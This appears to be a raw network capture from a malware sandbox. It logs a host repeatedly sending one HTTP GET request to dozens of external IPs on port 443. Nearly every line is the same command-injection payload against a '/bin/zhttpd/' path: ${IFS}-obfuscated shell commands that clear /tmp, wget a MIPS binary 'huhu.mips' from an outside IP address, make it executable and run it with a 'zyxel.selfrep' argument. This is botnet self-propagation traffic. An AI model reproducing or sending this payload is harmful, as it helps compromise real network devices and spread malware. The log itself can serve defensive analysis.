                                                        Feb 2, 2024 06:21:01.771370888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2531192.168.2.145571480.149.83.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771415949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2532192.168.2.1455804173.128.109.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771461964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2533192.168.2.1433400199.116.118.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771500111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2534192.168.2.1437340135.199.106.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771542072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2535192.168.2.1446234202.137.202.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771604061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2536192.168.2.1435406181.90.194.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771626949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2537192.168.2.1453436109.225.171.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771656990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2538192.168.2.1460120160.120.144.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771692991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2539192.168.2.1438748185.7.61.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771739006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2540192.168.2.1451458208.251.24.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771774054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2541192.168.2.1452580203.251.150.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771806002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2542192.168.2.1455594210.22.87.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.771861076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2543192.168.2.145969651.12.63.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775286913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2544192.168.2.1449092158.13.208.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775319099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2545192.168.2.144597059.232.52.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775345087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2546192.168.2.146018471.134.31.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775382042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2547192.168.2.145241286.0.200.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775438070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2548192.168.2.1435020173.219.229.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775497913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2549192.168.2.145831425.224.104.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775528908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2550192.168.2.1460018213.210.24.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775563002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2551192.168.2.146008439.46.75.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775650024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2552192.168.2.14359965.183.46.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775682926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2553192.168.2.143714220.98.55.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775710106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2554192.168.2.1437066134.96.174.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775751114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2555192.168.2.1435760101.211.143.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775799036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2556192.168.2.1446782159.100.55.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775849104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2557192.168.2.145348451.38.176.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775863886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2558192.168.2.1446716120.34.39.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775907040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2559192.168.2.1456602121.214.194.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:01.775960922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2560192.168.2.1440216152.9.138.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.784657955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2561192.168.2.1458632203.239.20.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.784708023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2562192.168.2.143630842.151.164.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.784734011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2563192.168.2.1436578167.191.17.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.784790039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2564192.168.2.1445740118.227.193.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.784836054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2565192.168.2.1444114115.253.149.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.784854889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2566192.168.2.1452828117.74.124.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.784909010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2567192.168.2.1441416200.113.96.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.784955025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2568192.168.2.1448524167.68.0.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.784985065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2569192.168.2.1448250198.160.202.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785018921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2570192.168.2.1457088161.125.72.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785059929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2571192.168.2.145925665.58.24.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785110950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2572192.168.2.1437604168.202.178.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785135984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2573192.168.2.1436494167.118.46.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785171986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2574192.168.2.145773846.79.24.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785227060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2575192.168.2.1439018157.240.84.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785245895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2576192.168.2.144035293.133.59.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785310984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2577192.168.2.1441878208.82.228.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785327911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2578192.168.2.145342291.142.83.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785366058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2579192.168.2.1453596121.6.195.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785403013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2580192.168.2.1455662117.196.29.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785449028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2581192.168.2.1440156208.9.193.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785495996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2582192.168.2.1451380173.100.144.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785526991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2583192.168.2.145129035.169.3.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785557985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2584192.168.2.1451336222.34.24.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785597086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2585192.168.2.146015861.140.170.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785641909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2586192.168.2.144668695.231.13.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785681963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2587192.168.2.1440644167.118.229.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785722971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2588192.168.2.143627435.233.242.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785736084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2589192.168.2.1449446171.119.247.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785789013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2590192.168.2.143673889.18.167.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785825014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2591192.168.2.145960042.249.185.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785856962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2592192.168.2.1451374133.148.24.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785906076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2593192.168.2.1438832205.191.189.130443
                                                        TimestampBytes transferredDirectionData
